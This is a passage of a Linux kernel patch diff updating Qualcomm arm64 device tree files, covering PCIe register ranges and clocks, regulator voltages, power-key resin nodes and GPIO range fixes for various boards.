+ 			};
+ 		};
+ 
+@@ -772,9 +773,9 @@
+ 			phy-names = "pciephy";
+ 
+ 			ranges = <0x81000000 0 0x10200000 0x10200000
+-				  0 0x100000   /* downstream I/O */
+-				  0x82000000 0 0x10300000 0x10300000
+-				  0 0xd00000>; /* non-prefetchable memory */
++				  0 0x10000>,   /* downstream I/O */
++				 <0x82000000 0 0x10220000 0x10220000
++				  0 0xfde0000>; /* non-prefetchable memory */
+ 
+ 			interrupts = <GIC_SPI 85 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -817,16 +818,18 @@
+ 		};
+ 
+ 		pcie0: pci@20000000 {
+-			compatible = "qcom,pcie-ipq8074";
++			compatible = "qcom,pcie-ipq8074-gen3";
+ 			reg = <0x20000000 0xf1d>,
+ 			      <0x20000f20 0xa8>,
+-			      <0x00080000 0x2000>,
++			      <0x20001000 0x1000>,
++			      <0x00080000 0x4000>,
+ 			      <0x20100000 0x1000>;
+-			reg-names = "dbi", "elbi", "parf", "config";
++			reg-names = "dbi", "elbi", "atu", "parf", "config";
+ 			device_type = "pci";
+ 			linux,pci-domain = <0>;
+ 			bus-range = <0x00 0xff>;
+ 			num-lanes = <1>;
++			max-link-speed = <3>;
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+@@ -834,9 +837,9 @@
+ 			phy-names = "pciephy";
+ 
+ 			ranges = <0x81000000 0 0x20200000 0x20200000
+-				  0 0x100000   /* downstream I/O */
+-				  0x82000000 0 0x20300000 0x20300000
+-				  0 0xd00000>; /* non-prefetchable memory */
++				  0 0x10000>, /* downstream I/O */
++				 <0x82000000 0 0x20220000 0x20220000
++				  0 0xfde0000>; /* non-prefetchable memory */
+ 
+ 			interrupts = <GIC_SPI 52 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -854,28 +857,30 @@
+ 			clocks = <&gcc GCC_SYS_NOC_PCIE0_AXI_CLK>,
+ 				 <&gcc GCC_PCIE0_AXI_M_CLK>,
+ 				 <&gcc GCC_PCIE0_AXI_S_CLK>,
+-				 <&gcc GCC_PCIE0_AHB_CLK>,
+-				 <&gcc GCC_PCIE0_AUX_CLK>;
+-
++				 <&gcc GCC_PCIE0_AXI_S_BRIDGE_CLK>,
++				 <&gcc GCC_PCIE0_RCHNG_CLK>;
+ 			clock-names = "iface",
+ 				      "axi_m",
+ 				      "axi_s",
+-				      "ahb",
+-				      "aux";
++				      "axi_bridge",
++				      "rchng";
++
+ 			resets = <&gcc GCC_PCIE0_PIPE_ARES>,
+ 				 <&gcc GCC_PCIE0_SLEEP_ARES>,
+ 				 <&gcc GCC_PCIE0_CORE_STICKY_ARES>,
+ 				 <&gcc GCC_PCIE0_AXI_MASTER_ARES>,
+ 				 <&gcc GCC_PCIE0_AXI_SLAVE_ARES>,
+ 				 <&gcc GCC_PCIE0_AHB_ARES>,
+-				 <&gcc GCC_PCIE0_AXI_MASTER_STICKY_ARES>;
++				 <&gcc GCC_PCIE0_AXI_MASTER_STICKY_ARES>,
++				 <&gcc GCC_PCIE0_AXI_SLAVE_STICKY_ARES>;
+ 			reset-names = "pipe",
+ 				      "sleep",
+ 				      "sticky",
+ 				      "axi_m",
+ 				      "axi_s",
+ 				      "ahb",
+-				      "axi_m_sticky";
++				      "axi_m_sticky",
++				      "axi_s_sticky";
+ 			status = "disabled";
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/msm8953.dtsi b/arch/arm64/boot/dts/qcom/msm8953.dtsi
+index 32349174c4bd9..70f033656b555 100644
+--- a/arch/arm64/boot/dts/qcom/msm8953.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8953.dtsi
+@@ -455,7 +455,7 @@
+ 			reg = <0x1000000 0x300000>;
+ 			interrupts = <GIC_SPI 208 IRQ_TYPE_LEVEL_HIGH>;
+ 			gpio-controller;
+-			gpio-ranges = <&tlmm 0 0 155>;
++			gpio-ranges = <&tlmm 0 0 142>;
+ 			#gpio-cells = <2>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <2>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8956.dtsi b/arch/arm64/boot/dts/qcom/msm8956.dtsi
+index e432512d8716a..668e05185c21e 100644
+--- a/arch/arm64/boot/dts/qcom/msm8956.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8956.dtsi
+@@ -12,6 +12,10 @@
+ 	interrupts = <GIC_PPI 7 (GIC_CPU_MASK_SIMPLE(6) | IRQ_TYPE_LEVEL_HIGH)>;
+ };
+ 
++&tsens {
++	compatible = "qcom,msm8956-tsens", "qcom,tsens-v1";
++};
++
+ /*
+  * You might be wondering.. why is it so empty out there?
+  * Well, the SoCs are almost identical.
+diff --git a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
+index 79de9cc395c4c..cd77dcb558722 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
+@@ -2,7 +2,7 @@
+ /*
+  * Copyright (c) 2015, LGE Inc. All rights reserved.
+  * Copyright (c) 2016, The Linux Foundation. All rights reserved.
+- * Copyright (c) 2021, Petr Vorel <petr.vorel@gmail.com>
++ * Copyright (c) 2021-2022, Petr Vorel <petr.vorel@gmail.com>
+  * Copyright (c) 2022, Dominik Kobinski <dominikkobinski314@gmail.com>
+  */
+ 
+@@ -15,6 +15,9 @@
+ /* cont_splash_mem has different memory mapping */
+ /delete-node/ &cont_splash_mem;
+ 
++/* disabled on downstream, conflicts with cont_splash_mem */
++/delete-node/ &dfps_data_mem;
++
+ / {
+ 	model = "LG Nexus 5X";
+ 	compatible = "lg,bullhead", "qcom,msm8992";
+@@ -49,12 +52,17 @@
+ 		};
+ 
+ 		cont_splash_mem: memory@3400000 {
+-			reg = <0 0x03400000 0 0x1200000>;
++			reg = <0 0x03400000 0 0xc00000>;
+ 			no-map;
+ 		};
+ 
+-		removed_region: reserved@5000000 {
+-			reg = <0 0x05000000 0 0x2200000>;
++		reserved@5000000 {
++			reg = <0x0 0x05000000 0x0 0x1a00000>;
++			no-map;
++		};
++
++		reserved@6c00000 {
++			reg = <0x0 0x06c00000 0x0 0x400000>;
+ 			no-map;
+ 		};
+ 	};
+@@ -86,8 +94,8 @@
+ 		/* S1, S2, S6 and S12 are managed by RPMPD */
+ 
+ 		pm8994_s1: s1 {
+-			regulator-min-microvolt = <800000>;
+-			regulator-max-microvolt = <800000>;
++			regulator-min-microvolt = <1025000>;
++			regulator-max-microvolt = <1025000>;
+ 		};
+ 
+ 		pm8994_s2: s2 {
+@@ -243,11 +251,8 @@
+ 		};
+ 
+ 		pm8994_l26: l26 {
+-			/*
+-			 * TODO: value from downstream
+-			 * regulator-min-microvolt = <987500>;
+-			 * fails to apply
+-			 */
++			regulator-min-microvolt = <987500>;
++			regulator-max-microvolt = <987500>;
+ 		};
+ 
+ 		pm8994_l27: l27 {
+@@ -261,19 +266,13 @@
+ 		};
+ 
+ 		pm8994_l29: l29 {
+-			/*
+-			 * TODO: Unsupported voltage range.
+-			 * regulator-min-microvolt = <2800000>;
+-			 * regulator-max-microvolt = <2800000>;
+-			 */
++			regulator-min-microvolt = <2800000>;
++			regulator-max-microvolt = <2800000>;
+ 		};
+ 
+ 		pm8994_l30: l30 {
+-			/*
+-			 * TODO: get this verified
+-			 * regulator-min-microvolt = <1800000>;
+-			 * regulator-max-microvolt = <1800000>;
+-			 */
++			regulator-min-microvolt = <1800000>;
++			regulator-max-microvolt = <1800000>;
+ 		};
+ 
+ 		pm8994_l31: l31 {
+@@ -282,11 +281,8 @@
+ 		};
+ 
+ 		pm8994_l32: l32 {
+-			/*
+-			 * TODO: get this verified
+-			 * regulator-min-microvolt = <1800000>;
+-			 * regulator-max-microvolt = <1800000>;
+-			 */
++			regulator-min-microvolt = <1800000>;
++			regulator-max-microvolt = <1800000>;
+ 		};
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8996-oneplus-common.dtsi b/arch/arm64/boot/dts/qcom/msm8996-oneplus-common.dtsi
+index 20f5c103c63b7..2994337c60464 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996-oneplus-common.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996-oneplus-common.dtsi
+@@ -179,7 +179,6 @@
+ };
+ 
+ &dsi0_phy {
+-	vdda-supply = <&vreg_l2a_1p25>;
+ 	vcca-supply = <&vreg_l28a_0p925>;
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/qcom/msm8996-sony-xperia-tone.dtsi b/arch/arm64/boot/dts/qcom/msm8996-sony-xperia-tone.dtsi
+index dec361b93ccea..be62899edf8e3 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996-sony-xperia-tone.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996-sony-xperia-tone.dtsi
+@@ -943,10 +943,6 @@
+ 	};
+ };
+ 
+-/*
+- * For reasons that are currently unknown (but probably related to fusb301), USB takes about
+- * 6 minutes to wake up (nothing interesting in kernel logs), but then it works as it should.
+- */
+ &usb3 {
+ 	status = "okay";
+ 	qcom,select-utmi-as-pipe-clk;
+@@ -955,6 +951,7 @@
+ &usb3_dwc3 {
+ 	extcon = <&usb3_id>;
+ 	dr_mode = "peripheral";
++	maximum-speed = "high-speed";
+ 	phys = <&hsusb_phy1>;
+ 	phy-names = "usb2-phy";
+ 	snps,hird-threshold = /bits/ 8 <0>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index d31464204f696..71678749d66f6 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -713,7 +713,7 @@
+ 			#power-domain-cells = <1>;
+ 			reg = <0x00300000 0x90000>;
+ 
+-			clocks = <&rpmcc RPM_SMD_BB_CLK1>,
++			clocks = <&rpmcc RPM_SMD_XO_CLK_SRC>,
+ 				 <&rpmcc RPM_SMD_LN_BB_CLK>,
+ 				 <&sleep_clk>,
+ 				 <&pciephy_0>,
+@@ -830,9 +830,11 @@
+ 			compatible = "qcom,msm8996-a2noc";
+ 			reg = <0x00583000 0x7000>;
+ 			#interconnect-cells = <1>;
+-			clock-names = "bus", "bus_a";
++			clock-names = "bus", "bus_a", "aggre2_ufs_axi", "ufs_axi";
+ 			clocks = <&rpmcc RPM_SMD_AGGR2_NOC_CLK>,
+-				 <&rpmcc RPM_SMD_AGGR2_NOC_A_CLK>;
++				 <&rpmcc RPM_SMD_AGGR2_NOC_A_CLK>,
++				 <&gcc GCC_AGGRE2_UFS_AXI_CLK>,
++				 <&gcc GCC_UFS_AXI_CLK>;
+ 		};
+ 
+ 		mnoc: interconnect@5a4000 {
+@@ -1050,7 +1052,7 @@
+ 				#clock-cells = <1>;
+ 				#phy-cells = <0>;
+ 
+-				clocks = <&mmcc MDSS_AHB_CLK>, <&rpmcc RPM_SMD_BB_CLK1>;
++				clocks = <&mmcc MDSS_AHB_CLK>, <&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 				clock-names = "iface", "ref";
+ 				status = "disabled";
+ 			};
+@@ -1117,7 +1119,7 @@
+ 				#clock-cells = <1>;
+ 				#phy-cells = <0>;
+ 
+-				clocks = <&mmcc MDSS_AHB_CLK>, <&rpmcc RPM_SMD_BB_CLK1>;
++				clocks = <&mmcc MDSS_AHB_CLK>, <&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 				clock-names = "iface", "ref";
+ 				status = "disabled";
+ 			};
+@@ -2940,8 +2942,8 @@
+ 			compatible = "qcom,msm8996-apcc";
+ 			reg = <0x06400000 0x90000>;
+ 
+-			clock-names = "xo";
+-			clocks = <&rpmcc RPM_SMD_BB_CLK1>;
++			clock-names = "xo", "sys_apcs_aux";
++			clocks = <&rpmcc RPM_SMD_XO_A_CLK_SRC>, <&apcs_glb>;
+ 
+ 			#clock-cells = <1>;
+ 		};
+@@ -3060,7 +3062,7 @@
+ 			clock-names = "iface", "core", "xo";
+ 			clocks = <&gcc GCC_SDCC1_AHB_CLK>,
+ 				<&gcc GCC_SDCC1_APPS_CLK>,
+-				<&rpmcc RPM_SMD_BB_CLK1>;
++				<&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 			resets = <&gcc GCC_SDCC1_BCR>;
+ 
+ 			pinctrl-names = "default", "sleep";
+@@ -3084,7 +3086,7 @@
+ 			clock-names = "iface", "core", "xo";
+ 			clocks = <&gcc GCC_SDCC2_AHB_CLK>,
+ 				<&gcc GCC_SDCC2_APPS_CLK>,
+-				<&rpmcc RPM_SMD_BB_CLK1>;
++				<&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 			resets = <&gcc GCC_SDCC2_BCR>;
+ 
+ 			pinctrl-names = "default", "sleep";
+@@ -3406,7 +3408,7 @@
+ 			interrupt-names = "wdog", "fatal", "ready",
+ 					  "handover", "stop-ack";
+ 
+-			clocks = <&rpmcc RPM_SMD_BB_CLK1>;
++			clocks = <&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 			clock-names = "xo";
+ 
+ 			memory-region = <&adsp_mem>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8998-fxtec-pro1.dts b/arch/arm64/boot/dts/qcom/msm8998-fxtec-pro1.dts
+index 310f7a2df1e83..510d12c8c5126 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998-fxtec-pro1.dts
++++ b/arch/arm64/boot/dts/qcom/msm8998-fxtec-pro1.dts
+@@ -364,14 +364,9 @@
+ 	};
+ };
+ 
+-&pm8998_pon {
+-	resin {
+-		compatible = "qcom,pm8941-resin";
+-		interrupts = <GIC_SPI 0x8 1 IRQ_TYPE_EDGE_BOTH>;
+-		bias-pull-up;
+-		debounce = <15625>;
+-		linux,code = <KEY_VOLUMEDOWN>;
+-	};
++&pm8998_resin {
++	linux,code = <KEY_VOLUMEDOWN>;
++	status = "okay";
+ };
+ 
+ &qusb2phy {
+diff --git a/arch/arm64/boot/dts/qcom/msm8998-sony-xperia-yoshino.dtsi b/arch/arm64/boot/dts/qcom/msm8998-sony-xperia-yoshino.dtsi
+index 5da87baa2b23b..3bbd5df196bfc 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998-sony-xperia-yoshino.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8998-sony-xperia-yoshino.dtsi
+@@ -357,14 +357,9 @@
+ 	};
+ };
+ 
+-&pm8998_pon {
+-	resin {
+-		compatible = "qcom,pm8941-resin";
+-		interrupts = <GIC_SPI 0x8 1 IRQ_TYPE_EDGE_BOTH>;
+-		debounce = <15625>;
+-		bias-pull-up;
+-		linux,code = <KEY_VOLUMEUP>;
+-	};
++&pm8998_resin {
++	linux,code = <KEY_VOLUMEUP>;
++	status = "okay";
+ };
+ 
+ &qusb2phy {
+diff --git a/arch/arm64/boot/dts/qcom/pmi8950.dtsi b/arch/arm64/boot/dts/qcom/pmi8950.dtsi
+index 32d27e2187e38..8008f02434a9e 100644
+--- a/arch/arm64/boot/dts/qcom/pmi8950.dtsi
++++ b/arch/arm64/boot/dts/qcom/pmi8950.dtsi
+@@ -47,7 +47,7 @@
+ 			adc-chan@a {
+ 				reg = <VADC_REF_1250MV>;
+ 				qcom,pre-scaling = <1 1>;
+-				label = "ref_1250v";
++				label = "ref_1250mv";
+ 			};
+ 
+ 			adc-chan@d {
+diff --git a/arch/arm64/boot/dts/qcom/pmk8350.dtsi b/arch/arm64/boot/dts/qcom/pmk8350.dtsi
+index 32f5e6af8c11c..f26fb7d32faf2 100644
+--- a/arch/arm64/boot/dts/qcom/pmk8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/pmk8350.dtsi
+@@ -21,7 +21,7 @@
+ 		#size-cells = <0>;
+ 
+ 		pmk8350_pon: pon@1300 {
+-			compatible = "qcom,pm8998-pon";
++			compatible = "qcom,pmk8350-pon";
+ 			reg = <0x1300>, <0x800>;
+ 			reg-names = "hlos", "pbs";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/qcs404.dtsi b/arch/arm64/boot/dts/qcom/qcs404.dtsi
+index a5324eecb50a9..502dd6db491e2 100644
+--- a/arch/arm64/boot/dts/qcom/qcs404.dtsi
++++ b/arch/arm64/boot/dts/qcom/qcs404.dtsi
+@@ -806,7 +806,7 @@
+ 
+ 			clocks = <&gcc GCC_PCIE_0_PIPE_CLK>;
+ 			resets = <&gcc GCC_PCIEPHY_0_PHY_BCR>,
+-				 <&gcc 21>;
++				 <&gcc GCC_PCIE_0_PIPE_ARES>;
+ 			reset-names = "phy", "pipe";
+ 
+ 			clock-output-names = "pcie_0_pipe_clk";
+@@ -1336,12 +1336,12 @@
+ 				 <&gcc GCC_PCIE_0_SLV_AXI_CLK>;
+ 			clock-names = "iface", "aux", "master_bus", "slave_bus";
+ 
+-			resets = <&gcc 18>,
+-				 <&gcc 17>,
+-				 <&gcc 15>,
+-				 <&gcc 19>,
++			resets = <&gcc GCC_PCIE_0_AXI_MASTER_ARES>,
++				 <&gcc GCC_PCIE_0_AXI_SLAVE_ARES>,
++				 <&gcc GCC_PCIE_0_AXI_MASTER_STICKY_ARES>,
++				 <&gcc GCC_PCIE_0_CORE_STICKY_ARES>,
+ 				 <&gcc GCC_PCIE_0_BCR>,
+-				 <&gcc 16>;
++				 <&gcc GCC_PCIE_0_AHB_ARES>;
+ 			reset-names = "axi_m",
+ 				      "axi_s",
+ 				      "axi_m_sticky",
+diff --git a/arch/arm64/boot/dts/qcom/sc7180.dtsi b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+index f71cf21a8dd8a..e45726be81c82 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+@@ -3274,8 +3274,8 @@
+ 			interrupts-extended = <&pdc 1 IRQ_TYPE_LEVEL_HIGH>;
+ 			qcom,ee = <0>;
+ 			qcom,channel = <0>;
+-			#address-cells = <1>;
+-			#size-cells = <1>;
++			#address-cells = <2>;
++			#size-cells = <0>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <4>;
+ 			cell-index = <0>;
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index 0adf13399e649..3bedd45e14afd 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -4246,8 +4246,8 @@
+ 			interrupts-extended = <&pdc 1 IRQ_TYPE_LEVEL_HIGH>;
+ 			qcom,ee = <0>;
+ 			qcom,channel = <0>;
+-			#address-cells = <1>;
+-			#size-cells = <1>;
++			#address-cells = <2>;
++			#size-cells = <0>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <4>;
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+index 71cf81a8eb4da..8363e82369854 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+@@ -1863,6 +1863,7 @@
+ 					  "ss_phy_irq";
+ 
+ 			power-domains = <&gcc USB30_PRIM_GDSC>;
++			required-opps = <&rpmhpd_opp_nom>;
+ 
+ 			resets = <&gcc GCC_USB30_PRIM_BCR>;
+ 
+@@ -1917,6 +1918,7 @@
+ 					  "ss_phy_irq";
+ 
+ 			power-domains = <&gcc USB30_SEC_GDSC>;
++			required-opps = <&rpmhpd_opp_nom>;
+ 
+ 			resets = <&gcc GCC_USB30_SEC_BCR>;
+ 
+@@ -2051,8 +2053,8 @@
+ 			interrupts-extended = <&pdc 1 IRQ_TYPE_LEVEL_HIGH>;
+ 			qcom,ee = <0>;
+ 			qcom,channel = <0>;
+-			#address-cells = <1>;
+-			#size-cells = <1>;
++			#address-cells = <2>;
++			#size-cells = <0>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <4>;
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sdm670-google-sargo.dts b/arch/arm64/boot/dts/qcom/sdm670-google-sargo.dts
+index cf2ae540db125..e3e61b9d1b9d7 100644
+--- a/arch/arm64/boot/dts/qcom/sdm670-google-sargo.dts
++++ b/arch/arm64/boot/dts/qcom/sdm670-google-sargo.dts
+@@ -256,6 +256,7 @@
+ 			regulator-min-microvolt = <1800000>;
+ 			regulator-max-microvolt = <1800000>;
+ 			regulator-enable-ramp-delay = <250>;
++			regulator-always-on;
+ 		};
+ 
+ 		vreg_l9a_1p8: ldo9 {
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+index f41c6d600ea8c..75a4645936232 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+@@ -615,14 +615,9 @@
+ 	};
+ };
+ 
+-&pm8998_pon {
+-	resin {
+-		compatible = "qcom,pm8941-resin";
+-		interrupts = <0x0 0x8 1 IRQ_TYPE_EDGE_BOTH>;
+-		debounce = <15625>;
+-		bias-pull-up;
+-		linux,code = <KEY_VOLUMEDOWN>;
+-	};
++&pm8998_resin {
++	linux,code = <KEY_VOLUMEDOWN>;
++	status = "okay";
+ };
+ 
+ &pmi8998_lpg {
+@@ -979,7 +974,7 @@
+ 	};
+ 
+ 	wcd_intr_default: wcd_intr_default {
+-		pins = <54>;
++		pins = "gpio54";
+ 		function = "gpio";
+ 
+ 		input-enable;
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-lg-common.dtsi b/arch/arm64/boot/dts/qcom/sdm845-lg-common.dtsi
+index 1eb423e4be24c..943287804e1a6 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-lg-common.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-lg-common.dtsi
+@@ -482,14 +482,9 @@
+ 	status = "okay";
+ };
+ 
+-&pm8998_pon {
+-	resin {
+-		compatible = "qcom,pm8941-resin";
+-		interrupts = <0x0 0x8 1 IRQ_TYPE_EDGE_BOTH>;
+-		debounce = <15625>;
+-		bias-pull-up;
+-		linux,code = <KEY_VOLUMEDOWN>;
+-	};
++&pm8998_resin {
++	linux,code = <KEY_VOLUMEDOWN>;
++	status = "okay";
+ };
+ 
+ &sdhc_2 {
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-shift-axolotl.dts b/arch/arm64/boot/dts/qcom/sdm845-shift-axolotl.dts
+index bb77ccfdc68c0..e6191602c70a8 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-shift-axolotl.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-shift-axolotl.dts
+@@ -522,14 +522,9 @@
+ 	};
+ };
+ 
+-&pm8998_pon {
+-	volume_down_resin: resin {
+-		compatible = "qcom,pm8941-resin";
+-		interrupts = <0x0 0x8 1 IRQ_TYPE_EDGE_BOTH>;
+-		debounce = <15625>;
+-		bias-pull-up;
+-		linux,code = <KEY_VOLUMEDOWN>;
+-	};
++&pm8998_resin {
++	linux,code = <KEY_VOLUMEDOWN>;
++	status = "okay";
+ };
+ 
+ &pmi8998_lpg {
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-beryllium-common.dtsi b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-beryllium-common.dtsi
+index eb6b2b676eca4..d2866155dd870 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-beryllium-common.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-beryllium-common.dtsi
+@@ -325,14 +325,9 @@
+ 	qcom,cabc;
+ };
+ 
+-&pm8998_pon {
+-	resin {
+-		compatible = "qcom,pm8941-resin";
+-		interrupts = <0x0 0x8 1 IRQ_TYPE_EDGE_BOTH>;
+-		debounce = <15625>;
+-		bias-pull-up;
+-		linux,code = <KEY_VOLUMEDOWN>;
+-	};
++&pm8998_resin {
++	linux,code = <KEY_VOLUMEDOWN>;
++	status = "okay";
+ };
+ 
+ &pmi8998_rradc {
+@@ -472,7 +467,7 @@
+ 	};
+ 
+ 	wcd_intr_default: wcd_intr_default {
+-		pins = <54>;
++		pins = "gpio54";
+ 		function = "gpio";
+ 
+ 		input-enable;
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+index 38ba809a95cd6..fba229d0bd108 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+@@ -530,14 +530,9 @@
+ 	};
+ };
+ 
+-&pm8998_pon {
+-	resin {
+-		interrupts = <0x0 0x8 1 IRQ_TYPE_EDGE_BOTH>;
+-		compatible = "qcom,pm8941-resin";
+-		linux,code = <KEY_VOLUMEDOWN>;
+-		debounce = <15625>;
+-		bias-pull-up;
+-	};
++&pm8998_resin {
++	linux,code = <KEY_VOLUMEDOWN>;
++	status = "okay";
+ };
+ 
+ &q6afedai {
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index 65032b94b46d6..f36c23e7a2248 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -4593,7 +4593,6 @@
+ 					 <&dispcc DISP_CC_MDSS_DP_PIXEL_CLK>;
+ 				clock-names = "core_iface", "core_aux", "ctrl_link",
+ 					      "ctrl_link_iface", "stream_pixel";
+-				#clock-cells = <1>;
+ 				assigned-clocks = <&dispcc DISP_CC_MDSS_DP_LINK_CLK_SRC>,
+ 						  <&dispcc DISP_CC_MDSS_DP_PIXEL_CLK_SRC>;
+ 				assigned-clock-parents = <&dp_phy 0>, <&dp_phy 1>;
+diff --git a/arch/arm64/boot/dts/qcom/sm6115.dtsi b/arch/arm64/boot/dts/qcom/sm6115.dtsi
+index 572bf04adf906..9de56365703cf 100644
+--- a/arch/arm64/boot/dts/qcom/sm6115.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6115.dtsi
+@@ -296,6 +296,8 @@
+ 
+ 			rpmcc: clock-controller {
+ 				compatible = "qcom,rpmcc-sm6115", "qcom,rpmcc";
++				clocks = <&xo_board>;
++				clock-names = "xo";
+ 				#clock-cells = <1>;
+ 			};
+ 
+@@ -361,7 +363,7 @@
+ 			reg-names = "west", "south", "east";
+ 			interrupts = <GIC_SPI 227 IRQ_TYPE_LEVEL_HIGH>;
+ 			gpio-controller;
+-			gpio-ranges = <&tlmm 0 0 121>;
++			gpio-ranges = <&tlmm 0 0 114>; /* GPIOs + ufs_reset */
+ 			#gpio-cells = <2>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <2>;
+@@ -704,6 +706,7 @@
+ 		ufs_mem_hc: ufs@4804000 {
+ 			compatible = "qcom,sm6115-ufshc", "qcom,ufshc", "jedec,ufs-2.0";
+ 			reg = <0x04804000 0x3000>, <0x04810000 0x8000>;
++			reg-names = "std", "ice";
+ 			interrupts = <GIC_SPI 356 IRQ_TYPE_LEVEL_HIGH>;
+ 			phys = <&ufs_mem_phy_lanes>;
+ 			phy-names = "ufsphy";
+@@ -736,10 +739,10 @@
+ 					<0 0>,
+ 					<0 0>,
+ 					<37500000 150000000>,
+-					<75000000 300000000>,
+ 					<0 0>,
+ 					<0 0>,
+-					<0 0>;
++					<0 0>,
++					<75000000 300000000>;
+ 
+ 			status = "disabled";
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts b/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
+index 0de6c5b7f742e..09cff5d1d0ae8 100644
+--- a/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
++++ b/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
+@@ -41,17 +41,18 @@
+ 	};
+ 
+ 	gpio-keys {
+-		status = "okay";
+ 		compatible = "gpio-keys";
+-		autorepeat;
+ 
+-		key-vol-dn {
++		pinctrl-0 = <&vol_down_n>;
++		pinctrl-names = "default";
++
++		key-volume-down {
+ 			label = "Volume Down";
+ 			gpios = <&tlmm 47 GPIO_ACTIVE_LOW>;
+-			linux,input-type = <1>;
+ 			linux,code = <KEY_VOLUMEDOWN>;
+-			gpio-key,wakeup;
+ 			debounce-interval = <15>;
++			linux,can-disable;
++			wakeup-source;
+ 		};
+ 	};
+ 
+@@ -270,6 +271,14 @@
+ 
+ &tlmm {
+ 	gpio-reserved-ranges = <22 2>, <28 6>;
++
++	vol_down_n: vol-down-n-state {
++		pins = "gpio47";
++		function = "gpio";
++		drive-strength = <2>;
++		bias-disable;
++		input-enable;
++	};
+ };
+ 
+ &usb3 {
+diff --git a/arch/arm64/boot/dts/qcom/sm6125.dtsi b/arch/arm64/boot/dts/qcom/sm6125.dtsi
+index 7e25a4f85594f..bf9e8d45ee44f 100644
+--- a/arch/arm64/boot/dts/qcom/sm6125.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6125.dtsi
+@@ -442,9 +442,9 @@
+ 			reg = <0x01613000 0x180>;
+ 			#phy-cells = <0>;
+ 
+-			clocks = <&rpmcc RPM_SMD_XO_CLK_SRC>,
+-				 <&gcc GCC_AHB2PHY_USB_CLK>;
+-			clock-names = "ref", "cfg_ahb";
++			clocks = <&gcc GCC_AHB2PHY_USB_CLK>,
++				 <&rpmcc RPM_SMD_XO_CLK_SRC>;
